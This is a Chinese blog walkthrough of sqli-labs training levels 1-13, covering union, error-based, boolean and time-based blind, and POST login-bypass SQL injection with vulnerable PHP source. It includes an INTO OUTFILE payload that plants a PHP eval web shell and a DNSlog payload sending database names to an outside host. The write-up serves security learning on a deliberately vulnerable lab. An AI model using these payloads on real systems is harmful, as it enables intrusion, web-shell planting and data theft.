<!DOCTYPE html>
<html lang="en">

<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8">
	<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
	
	<!-- title -->
	
	<title>
	
		sqli-labs | 
	 
	ZeroP
	</title>
	
	<!-- keywords,description -->
	 

	<!-- favicon -->
	
	<link rel="shortcut icon" href="/ZeroP/favicon.ico">
	


	<!-- search -->
	<script>
		var searchEngine = "https://www.google.com/search?q=";
		if(typeof searchEngine == "undefined" || searchEngine == null || searchEngine == ""){
			searchEngine = "https://www.google.com/search?q=";
		}
		var homeHost = "wujun234.github.io";
		if(typeof homeHost == "undefined" || homeHost == null || homeHost == ""){
			homeHost = window.location.host;
		}
	</script>


	
<link rel="stylesheet" href="/ZeroP/css/main.css">

	
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.7.0/css/font-awesome.min.css">

	
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@9.17.1/build/styles/darcula.min.css">

	
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">


	
<script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>

	
<script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

	
<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@9.17.1/build/highlight.min.js"></script>

	
<script src="https://cdn.jsdelivr.net/npm/jquery-pjax@2.0.1/jquery.pjax.min.js"></script>

	
<script src="/ZeroP/js/main.js"></script>

	
		
<script src="https://cdn.jsdelivr.net/npm/leancloud-storage/dist/av-min.js"></script>

		
<script src="https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js"></script>

	
	
		<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
	<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?3efe99c287df5a1d6f0d02d187e403c1";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

<header id="header">
    <a id="title" href="/ZeroP/" class="logo">ZeroP</a>

	<ul id="menu">
		<li class="menu-item">
			<a href="/about" class="menu-item-link">ABOUT</a>
		</li>
	

	

		<li class="menu-item">
			<a href="https://github.com/wujun234/uid-generator-spring-boot-starter" class="menu-item-link" target="_blank">
				UidGenerator
			</a>
		</li>
		<li class="menu-item">
			<a href="https://github.com/wujun234" class="menu-item-link" target="_blank">
				<i class="fa fa-github fa-2x"></i>
			</a>
		</li>
	</ul>
</header>

	
<div id="sidebar">
	<button id="sidebar-toggle" class="toggle" ><i class="fa fa-arrow-right " aria-hidden="true"></i></button>
	
	<div id="site-toc">
		<input id="search-input" class="search-input" type="search" placeholder="按回车全站搜索">
		<div id="tree">
			

			
							<ul>
								<li class="directory">
									<a href="#" class="directory">
										<i class="fa fa-plus-square-o"></i>
										WEB安全
									</a>
									
							<ul>
								<li class="directory">
									<a href="#" class="directory">
										<i class="fa fa-plus-square-o"></i>
										注入攻击
									</a>
									
							<ul>
								<li class="directory">
									<a href="#" class="directory">
										<i class="fa fa-plus-square-o"></i>
										SQL注入
									</a>
									
							<ul>
								<li class="file">
									<a href="/ZeroP/2021/09/16/WEB%E5%AE%89%E5%85%A8/%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/SQL%E6%B3%A8%E5%85%A5/00%20SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%AE%BA/">
										00 SQL注入导论
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
							<ul>
								<li class="file">
									<a href="/ZeroP/2021/09/16/WEB%E5%AE%89%E5%85%A8/%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/SQL%E6%B3%A8%E5%85%A5/01%20MySQL%E6%B3%A8%E5%85%A5/">
										01 MySQL注入
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
								</li>
								
							</ul>
			
							<ul>
								<li class="file">
									<a href="/ZeroP/2021/09/17/WEB%E5%AE%89%E5%85%A8/%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/">
										命令注入
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
								</li>
								
							</ul>
			
								</li>
								
							</ul>
			
							<ul>
								<li class="directory">
									<a href="#" class="directory">
										<i class="fa fa-plus-square-o"></i>
										靶场通关
									</a>
									
							<ul>
								<li class="file">
									<a href="/ZeroP/2021/10/02/%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/fileupload-labs/">
										fileupload-labs
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
							<ul>
								<li class="file active">
									<a href="/ZeroP/2021/10/02/%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/sqli-labs/">
										sqli-labs
									</a>
								</li>
								<div class="article-toc" style="display: none;"></div>
							</ul>
			
								</li>
								
							</ul>
			
		</div>
	</div>
</div>

	<!-- 引入正文 -->
	<div id="content">
		<h1 id="article-title">

	sqli-labs
</h1>
<div class="article-meta">
	
	<span>ZeroP零点</span>
	<span>2021-10-02 11:13:48</span>
		<div id="article-categories">
    
		<span>Categories：</span>
            
    

    
		<span>Tags：</span>
            
                
                    <span>
                        <i class="fa fa-tag" aria-hidden="true">
                        <a href="/tags/靶场/">靶场</a>
                        </i>
                    </span>
                
            
                
                    <span>
                        <i class="fa fa-tag" aria-hidden="true">
                        <a href="/tags/SQL注入/">SQL注入</a>
                        </i>
                    </span>
                
            
    
		</div>

</div>

<div id="article-content">
	<h2 id="SQL-Injections-Page-1">SQL Injections Page 1</h2>
<h3 id="Get-Error-based-Single-quotes-String-Less-1">Get - Error based - Single quotes - String Less-1</h3>
<p>此注入为单引号报错注入，需要闭合引号<code>'</code>=<code>%27</code></p>
<pre><code class="highlight mysql">sqli-labs/Less-1/?id=1%27 and 1=1 -- -   #正常显示
sqli-labs/Less-1/?id=1%27 and 1=2 -- -   #无返回结果</code></pre>
<p>至于为什么使用单引号闭合，如下：</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=&#x27;<span class="subst">$id</span>&#x27; LIMIT 0,1&quot;</span>; <span class="comment">#直接吧id后面的1&#x27; and 1=2 -- - 放在$id的位置，所以就如下面这个语句$sql2</span>

<span class="variable">$sql2</span>=<span class="string">&quot;SELECT * FROM users WHERE id=&#x27;1&#x27; and 1=2 -- - &#x27; LIMIT 0,1&quot;</span>; <span class="comment">#`--`可以将后面的语句进行注释</span>
<span class="comment">#所以最后的sql语句就成了 `SELECT * FROM users WHERE id=&#x27;1&#x27; and 1=2` </span>
<span class="comment">#如果不闭合单引号就会成为id=&#x27;1 and 1=2</span></code></pre>
<p>然后就是爆字段数、显位</p>
<pre><code class="highlight mysql">#爆字段数
?id=1%27 order by 3 #不报错
?id=1%27 order by 4 #报错，说明字段数为3

#爆显位
?id=-1%27 union select 1,2,3 #如下图less-1-1，注意此时需要查询不到相应的数据，所以使用-1</code></pre>
<p><img src="https://s1.imagehub.cc/images/2021/10/02/image.png" alt="image.png"></p>
<center>【less-1-1】</center>
<p>接下来就是爆数据库名，版本信息，表名，字段名，字段具体数据了，后面基本没啥难度，就是简单的注入，下图less-1-2是爆数据库名和版本信息，具体代码如下：</p>
<pre><code class="highlight mysql">?id=-1%27 union select 1,database(),version() -- -</code></pre>
<p><img src="https://s1.imagehub.cc/images/2021/10/02/imagef6ec6c193860368c.png" alt="imagef6ec6c193860368c.png"></p>
<center>【less-1-2】</center>
<p>至于后面的操作就不赘述了</p>
<h3 id="Get-Error-based-intiger-based-Less-2">Get - Error based - intiger based  Less-2</h3>
<p>此注入为整数型注入，不需要闭合</p>
<p>此注入和less-1注入是大同小异，只是不需要加<code>'</code>罢了，剩下的操作一致</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=<span class="subst">$id</span> LIMIT 0,1&quot;</span>; <span class="comment">#可以看出id=后面是没有引号的</span></code></pre>
<pre><code class="highlight mysql">?id=1 and 1=1 #不报错
?id=1 and 1=2 #不显示正确数据，存在注入且注入为整数型注入</code></pre>
<p>接下来就是一样的了</p>
<h3 id="Get-Error-based-Single-quotes-with-twist-String">Get - Error based - Single quotes with twist - String</h3>
<p>此注入为带括号的单引号注入，需要闭合，php代码如下：</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=(&#x27;<span class="subst">$id</span>&#x27;) LIMIT 0,1&quot;</span>; <span class="comment">#可以里看出这次在id=后面添加了括号，所以闭合时也需要 </span></code></pre>
<p>这个注入总体和前面的是一致的，只是需要在构造的payload上添加<code>)</code>闭合</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=(&#x27;<span class="subst">$id</span>&#x27;) LIMIT 0,1&quot;</span>; <span class="comment">#如果只是添加&#x27;，不添加 ) 闭合就会报错，如下</span>
<span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=(&#x27;1%27 and 1=2 -- - &#x27;) LIMIT 0,1&quot;</span>; <span class="comment">#报错，所以就需要在payload上添加括号，如下：</span>
payload：?id=<span class="number">1</span>%<span class="number">27</span>) <span class="keyword">and</span> <span class="number">1</span>=<span class="number">2</span>
<span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=(&#x27;1%27) and 1=2 -- - &#x27;) LIMIT 0,1&quot;</span>; <span class="comment">#这样就是正确的</span></code></pre>
<p>接下来的爆显位，爆数据库名，表名，字段名如法炮制</p>
<h3 id="Get-Error-based-Double-quotes-String-Less-4">Get - Error based - Double quotes - String Less-4</h3>
<p>此注入为双引号字符型注入，需要闭合，和Less-1的区别就是将<code>'</code>换成<code>&quot;</code>，同时需要加<code>)</code>闭合即可，其他一致，只是看一下php源码如下：</p>
<pre><code class="highlight php"><span class="variable">$id</span> = <span class="string">&#x27;&quot;&#x27;</span> . <span class="variable">$id</span> . <span class="string">&#x27;&quot;&#x27;</span>;
<span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=(<span class="subst">$id</span>) LIMIT 0,1&quot;</span>;</code></pre>
<p>这是看源码出来的，但很多时候属于黑盒测试，是无法看到源码的，所以可以多试试不同的情况</p>
<h3 id="Get-Double-Injection-Single-quotes-String-Less-5">Get -  Double Injection - Single quotes - String Less-5</h3>
<p>次注入为单引号双注入，就是需要使用单引号，和布尔盲注同时进行</p>
<p>布尔盲注使用场景就是在不提供显位的情况下使用，他不像前面几个会提供显位，存在布尔盲注的页面基本是根据true和false的切换来判断是否存在，如果true是正常页面，false是缺失页面即可存在布尔注入，我们可以看源码就可以更好理解：</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=&#x27;<span class="subst">$id</span>&#x27; LIMIT 0,1&quot;</span>;
<span class="comment">#这里对id进行payload构造，可以如下：</span>
<span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=&#x27;1%27 and length(database())=8 -- -&#x27; LIMIT 0,1&quot;</span>;
<span class="comment">#这里的%27代替`&#x27;`，这个sql语句就是如果数据库的名字长度为8就是true，不为8就是false，这和前面的and 1=1 and 1=2是一样的原理</span>
<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);

	<span class="keyword">if</span>(<span class="variable">$row</span>)<span class="comment">#这里只是判断了是否有结果，如果有就显&#123;&#125;里面的页面，如果没有就显示else的内容</span>
	&#123;
  	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&#x27;</span>;	
  	<span class="keyword">echo</span> <span class="string">&#x27;You are in...........&#x27;</span>;
  	<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    	<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
  	&#125;
	<span class="keyword">else</span> 
	&#123;
	
	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;3&quot; color=&quot;#FFFF00&quot;&gt;&#x27;</span>;
	print_r(mysql_error());
	<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&lt;/font&gt;&quot;</span>;	
	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&#x27;</span>;	
	
	&#125;
&#125;</code></pre>
<p>但很多时候布尔盲注和其他注入情况是可以共存的，一般能不用布尔盲注的就不要用</p>
<p>下面是具体手法，后面在遇到类似将简写：</p>
<p>判断是否存在布尔盲注</p>
<pre><code class="highlight mysql">?id=1%27 and 1=1 #正常
?id=1%27 and 1=2 #报错
#存在注入，但是这个没有显位，所以就只能使用布尔盲注，我们可以将and后的条件成立情况换成我们需要的内容比如数据库长度，需要啥就换成对应的就可以了</code></pre>
<p>接下来猜解数据库名</p>
<pre><code class="highlight mysql">?id=1%27 and length(database())=8 -- - #正常
?id=1%27 and length(database())=7 -- - #报错，说明数据库名长度为8个字符

?id=1%27 and substr(database(),1,1)=&#x27;a&#x27; -- - #报错，说明第一个字母不是a
?id=1%27 and substr(database(),1,1)=&#x27;s&#x27; -- - #不报错，说明第一个字母是s
?id=1%27 and substr(database(),2,1)=&#x27;e&#x27; -- - #不报错，说明第一个字母是e

#以此类推可以得出数据库名</code></pre>
<p>得到数据库名后就是表名</p>
<pre><code class="highlight mysql">?id=1%27 and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=5) #报错
?id=1%27 and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6) #不报错，说明第一个表的表名字符数为6

?id=1%27 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=&#x27;e&#x27; #不报错，说明第一个字母为e，其余类推</code></pre>
<p>得到表名后的字段名</p>
<pre><code class="highlight mysql">?id=1%27 and (length((select column_name from information_schema.columns where table_name=&quot;users&quot; limit 0,1))=5) #报错
?id=1%27 and (length((select column_name from information_schema.columns where table_name=&quot;users&quot; limit 0,1))=6) #不报错，说明第一个字段的字段名字符数为6

?id=1%27 and substr((select column_name from information_schema.tables where table_name=&quot;users&quot; limit 0,1),1,1)=&#x27;i&#x27; #不报错，说明第一个字母为e，其余类推

#如果需要查询users表中的第二个字段只需要将limit 0,1改成limit 1,1
</code></pre>
<p>通过以上方法循环就可以得出内容和相应的数据</p>
<blockquote>
<p>以上方法虽然可以使用二分法对其进行简化判断次数（sqlmap盲注就是使用的二分法），但是总的来说还是太过于麻烦了，所以这时有前辈就想出了使用dnslog来获取盲注结果，当然也可以使用Apache日志来查询结果，使用外带数据注入的话需要secure_file_priv＝，否则不成功</p>
</blockquote>
<h3 id="Get-Double-Injection-Double-quotes-String-Less-6">Get - Double Injection - Double quotes - String Less-6</h3>
<p>此注入是双引号加布尔注入，其实总体思路就是和前面的Less-5差不多，只是将单引号改成双引号，这里就不多说了，略过</p>
<h3 id="Get-Dump-into-outfile-String-Less-7">Get - Dump into outfile - String Less-7</h3>
<p>这个主要是考的文件导出，一般可以配合load_file()一起使用，也可以单独使用，</p>
<p>有以下三个前提：</p>
<blockquote>
<p>root权限</p>
<p>知道绝对路径</p>
<p>secure_file_priv不是null或者’'，如果是tmp的话就必须写入到tmp里面去</p>
</blockquote>
<p>因为当前less-7是无法通过报错知道路劲的，但是在其他真实网站中是可以通过一系列手段爆出物理路径的</p>
<p>这个需要使用联合查询union</p>
<p>构造payload 如下：</p>
<pre><code class="highlight mysql">1%27)) union select 1,2,3,&#x27;&lt;?php @eval($_POST[&quot;cmd&quot;])?&gt;&#x27; into outfile &quot;C://phpstudy_pro//WWW//sqli-labs//1.php&quot; -- + #至于这里为什么要使用1%27))我们看源码可知需要如此构造，至于怎么找到有多少个查询字段的就不累述了，前面都有</code></pre>
<p>源码如下：</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=((&#x27;<span class="subst">$id</span>&#x27;)) LIMIT 0,1&quot;</span>;
<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);

	<span class="keyword">if</span>(<span class="variable">$row</span>)
	&#123;
  	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot;&gt;&#x27;</span>;	
  	<span class="keyword">echo</span> <span class="string">&#x27;You are in.... Use outfile......&#x27;</span>;
  	<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
  	<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
  	&#125;
	<span class="keyword">else</span> 
	&#123;
	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot;&gt;&#x27;</span>;
	<span class="keyword">echo</span> <span class="string">&#x27;You have an error in your SQL syntax&#x27;</span>;
	<span class="comment">//print_r(mysql_error());</span>
	<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;  
	&#125;
&#125;</code></pre>
<h3 id="Get-Blind-Boolean-Based-String-Quotes-Less-8">Get - Blind - Boolean Based -String Quotes Less-8</h3>
<p>这个注入是一个布尔盲注双引号闭合的，盲注我们在less-5就提过一嘴，且基本的注入流程差不多，验证流程也是一直的，但是这次我们使用dnslog来快速获取信息，但这个的话有一个前提是load_file()函数没有被禁用，因为我们需要用到此函数</p>
<p>dns网站有常用的两个，如下：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://dnslog.cn">http://dnslog.cn</a></p>
<p><a target="_blank" rel="noopener" href="http://ceye.io">http://ceye.io</a></p>
</blockquote>
<p>个人推荐使用dnslog，方便快捷，当然现在也有开源的dnslog可以自行搭建</p>
<p>dnslog网址获得如图Less-8-1</p>
<p><a target="_blank" rel="noopener" href="https://www.imagehub.cc/image/80zl7"><img src="https://s1.imagehub.cc/images/2021/10/03/image.png" alt="image.png"></a></p>
<center>【Less-8-1】</center>
<p>然后就可以构造payload了，如下：</p>
<pre><code class="highlight mysql">?id=1%27 and (load_file(concat(&#x27;\\\\&#x27;,(select database()),&#x27;.bkvbfs.dnslog.cn\\abc&#x27;))) -- - #这样就可以了</code></pre>
<p>效果如下Less-8-2</p>
<p><a target="_blank" rel="noopener" href="https://www.imagehub.cc/image/80gd6"><img src="https://s1.imagehub.cc/images/2021/10/03/imageb872f21e0a3a639e.png" alt="imageb872f21e0a3a639e.png"></a></p>
<center>【Less-8-2】</center>
<p>接下来的就只需要构造concat里面的第二个参数就可以了，但是由于用户名或者其他信息容易出现特殊字符，所以一般进行十六进制转换，payload如下：</p>
<pre><code class="highlight mysql">?id=1%27 and (load_file(concat(&#x27;\\\\&#x27;,(select hex(database())),&#x27;.bkvbfs.dnslog.cn\\abc&#x27;))) -- - #对其进行编码出来的是这样的</code></pre>
<p>如图Less-8-3</p>
<p><a target="_blank" rel="noopener" href="https://www.imagehub.cc/image/808G1"><img src="https://s1.imagehub.cc/images/2021/10/03/imagec195c22e6591bd03.png" alt="imagec195c22e6591bd03.png"></a></p>
<center>【Less-8-3】</center>
<p>剩下的就和普通的查询没啥区别了，也就不掩饰了</p>
<blockquote>
<p>DNSlog只在windows服务器上有效，如果服务器是Linux就无法使用dnslog来获取数据</p>
<p>至于为什么要使用四个\，这个是uac规定的，两个\为一个\</p>
</blockquote>
<h3 id="Get-Blind-Time-based-Single-quotes-Less-9">Get - Blind - Time based - Single quotes Less-9</h3>
<p>这个是一个时间型盲注，通过判断是否延时来决定是否存在注入，用到的函数最多最简单的就是sleep()，其实也可以使用慢查询，构造一个需要大量查询时间的查询语句来测试是否存在注入</p>
<p>首先我们看源码，如下：</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=&#x27;<span class="subst">$id</span>&#x27; LIMIT 0,1&quot;</span>;
<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);

	<span class="keyword">if</span>(<span class="variable">$row</span>)
	&#123;
  	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&#x27;</span>;	
  	<span class="keyword">echo</span> <span class="string">&#x27;You are in...........&#x27;</span>;
  	<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    	<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
  	&#125;
	<span class="keyword">else</span> 
	&#123;
	
	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&#x27;</span>;
	<span class="keyword">echo</span> <span class="string">&#x27;You are in...........&#x27;</span>;
	<span class="comment">//print_r(mysql_error());</span>
	<span class="comment">//echo &quot;You have an error in your SQL syntax&quot;;</span>
	<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&lt;/font&gt;&quot;</span>;	
	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&#x27;</span>;	
	
	&#125;
&#125;</code></pre>
<p>可以看出需要使用<code>'</code>构造，所以payload如下：</p>
<pre><code class="highlight mysql">?id=1%27 and sleep(5) -- -  #发现网页需要等待将近5秒才会完全显示就说明存在漏洞，也可以看浏览器的耗时，如下图Less-9-1</code></pre>
<p><img src="https://s1.imagehub.cc/images/2021/10/03/imagedc3de8fd8dc0aef6.png" alt="imagedc3de8fd8dc0aef6.png"></p>
<center>【Less-9-1】</center>
<p>至于后面的操作还需要一个if()函数判断</p>
<blockquote>
<p>if(x1,x2,x3)：如果x1成立就执行x2，否则执行x3</p>
</blockquote>
<p>所以构造的payload为：</p>
<pre><code class="highlight mysql">?id=1%27 and if(length(database())=8,sleep(5),1) -- - #如果database()长度为8就延时5秒，否则就不延时，当然延时是在符合后才执行或者不符合才执行看个人</code></pre>
<p>至于后面如何获取数据库名payload如下：</p>
<pre><code class="highlight mysql">?id=1%27 and if(substr(database(),1,1)=&#x27;s&#x27;,sleep(5),1) -- - #如果数据库第一个字符为s就延时5秒，后续结果和前面的盲注是一致的</code></pre>
<p>总的来说，盲注的话基本都是需要单个单个的猜解，所以时间盲注和布尔盲注原理都是一样的，后面表名字段名就不累述了，基本都是一样的</p>
<p>只要是盲注都可以使用DNSlog来解决，但是不能在Linux服务器上使用这个，同时还需要load_file()不被禁止，如果load_file()被 禁止就只能使用基本的方法来解决了，只要掌握了原理，也可以自己写脚本是一样的，但是有sqlmap就省去了很多的麻烦</p>
<h3 id="Get-Bind-Time-based-double-quotes-Less-10">Get - Bind - Time based - double quotes  Less-10</h3>
<p>这个注入其实也是时间注入，但是需要使用<code>&quot;</code>闭合，和less-9只是将<code>'</code>更改为<code>&quot;</code>就可以了，剩下的就千篇一律了，就不做更多的赘述了，还是看一下php源码吧，如下：</p>
<pre><code class="highlight php"><span class="variable">$id</span> = <span class="string">&#x27;&quot;&#x27;</span>.<span class="variable">$id</span>.<span class="string">&#x27;&quot;&#x27;</span>; <span class="comment">#在这个位置对id的值进行添加双引号操作</span>
<span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=<span class="subst">$id</span> LIMIT 0,1&quot;</span>;
<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);

	<span class="keyword">if</span>(<span class="variable">$row</span>)
	&#123;
  	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&#x27;</span>;	
  	<span class="keyword">echo</span> <span class="string">&#x27;You are in...........&#x27;</span>;
  	<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    	<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
  	&#125;
	<span class="keyword">else</span> 
	&#123;
	
	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&#x27;</span>;
	<span class="keyword">echo</span> <span class="string">&#x27;You are in...........&#x27;</span>;
	<span class="comment">//print_r(mysql_error());</span>
	<span class="comment">//echo &quot;You have an error in your SQL syntax&quot;;</span>
	<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&lt;/font&gt;&quot;</span>;	
	<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&#x27;</span>;	
	
	&#125;
&#125;</code></pre>
<p><font color='red'>以下部分就是属于post请求的sql注入了-v-</font></p>
<h3 id="POST-Error-based-Single-quotes-String-Less-11">POST - Error based - Single quotes - String Less-11</h3>
<p>这个在原理上基本和前面GET方法的是没有区别的，只是需要在表单中构造payload，如下图Less-11-1</p>
<p><img src="https://s1.imagehub.cc/images/2021/10/03/imageb09cf5d5d778391b.png" alt="imageb09cf5d5d778391b.png"></p>
<center>【Less-11-1】</center>
<p>至于后面的操作基本一致，就不再赘述了，前面的已经说的够多了</p>
<blockquote>
<p>注意事项：</p>
<ul>
<li>在这个靶场中的这关，我们需要知道username，使得我们能够正常查询，这种情况可以在用户登录框处且知道正确的用户名来进行注入，密码啥的不知道无所谓，因为我们将后面的password注释掉了</li>
<li>不要在第二个位置构造payload，因为基本不可能成功，至于为什么看源码</li>
</ul>
</blockquote>
<p>相对应的源码如下：</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT username, password FROM users WHERE username=&#x27;<span class="subst">$uname</span>&#x27; and password=&#x27;<span class="subst">$passwd</span>&#x27; LIMIT 0,1&quot;</span>; <span class="comment">#在这可以看出他是将用户名密码带进去一起匹配的，同时成立才会返回成功，但如果我们像下面这样构造</span>

<span class="variable">$sql</span>=<span class="string">&quot;SELECT username, password FROM users WHERE username=&#x27;<span class="subst">$uname</span>&#x27; and 1=1 # and password=&#x27;<span class="subst">$passwd</span>&#x27; LIMIT 0,1&quot;</span>; <span class="comment">#这样的话只需要$uname的值存在即可，因为我们使用`#`注释掉了后面password=&#x27;$passwd&#x27;...等，实际执行的语句就成了下面这样的</span>

<span class="variable">$sql</span>=<span class="string">&quot;SELECT username, password FROM users WHERE username=&#x27;<span class="subst">$uname</span>&#x27; and 1=1&quot;</span> <span class="comment">#这就是为什么要username一定存在的道理了，也就是为什么要构造username这个值而非password这个值了</span>
    
<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);
</code></pre>
<p>看了源码也就知道原理了，是不是和前面的一样嘛，就不多说了</p>
<blockquote>
<p>解释以下为什么用<code>#</code>，因为在前面的sql注入只是那里提过，<code>#</code>在mysql中是注释的意思，<code>--</code>也是注释的意思，为什么不用<code>--</code>因为太多了麻烦</p>
</blockquote>
<h3 id="POST-Error-based-Double-quotes-String-with-twist-Less-12">POST - Error based - Double quotes - String - with twist  Less-12</h3>
<p>其实这一个和Less-3是一样的，双引号加<code>)</code>构造，我们看下原理构造的payload就好了，至于后面的详细操作没啥说的，和前面一致</p>
<pre><code class="highlight php"><span class="comment">// connectivity</span>
<span class="variable">$uname</span>=<span class="string">&#x27;&quot;&#x27;</span>.<span class="variable">$uname</span>.<span class="string">&#x27;&quot;&#x27;</span>;<span class="comment">#这就是给值加双引号</span>
<span class="variable">$passwd</span>=<span class="string">&#x27;&quot;&#x27;</span>.<span class="variable">$passwd</span>.<span class="string">&#x27;&quot;&#x27;</span>; 
<span class="variable">$sql</span>=<span class="string">&quot;SELECT username, password FROM users WHERE username=(<span class="subst">$uname</span>) and password=(<span class="subst">$passwd</span>) LIMIT 0,1&quot;</span>;<span class="comment">#又因为这里存在括号，所以构造时需要括号加双引号</span>
<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);
</code></pre>
<p>源码很简单，没啥可说的，接下来就是payload，还是构造username这个的payload，为什么？自己领悟</p>
<pre><code class="highlight mysql">admin&quot;) and 1=1 # #返回成功</code></pre>
<p><img src="https://s1.imagehub.cc/images/2021/10/03/imageddc47be0f9fdcb6b.png" alt="imageddc47be0f9fdcb6b.png"></p>
<center>【Less-12-1】</center>
<h3 id="POST-Double-Injection-Single-quotes-String-with-twist-Less-13">POST -Double Injection - Single quotes - String - with twist  Less-13</h3>
<p>这个其实就是一个单引号加括号的一个双注入，这个和前面的，这个需要提一点的是这个无法使用联合查询，需要用到报错注入最方便快捷</p>
<blockquote>
<p>联合注入需要显位存在，所以在不存在显位的情况下我们就可以考虑盲注，报错注入</p>
</blockquote>
<p>payload如下：</p>
<pre><code class="highlight mysql">admin`&#x27;`) and (select extractvalue(1,concat(0x7e,(select database())))) # 
 #需要注释后面的语句，同前面一样需要在username处构造，为了观赏性 &#x27; 使用 `&#x27;` 括起来，自己用的时候去掉``即可</code></pre>
<p>在测试的时候发现盲注也是存在的，但是就盲注而言，报错注入最快，如果关闭了错误打印的话，就只能使用盲注了，但是盲注的话还可以使用dnslog加速注入的嘛。只要路子宽，sql注入打的欢</p>
<p>至于后面的表名字段名啥的，替换<code>select database()</code>就可以了，就不多说了</p>
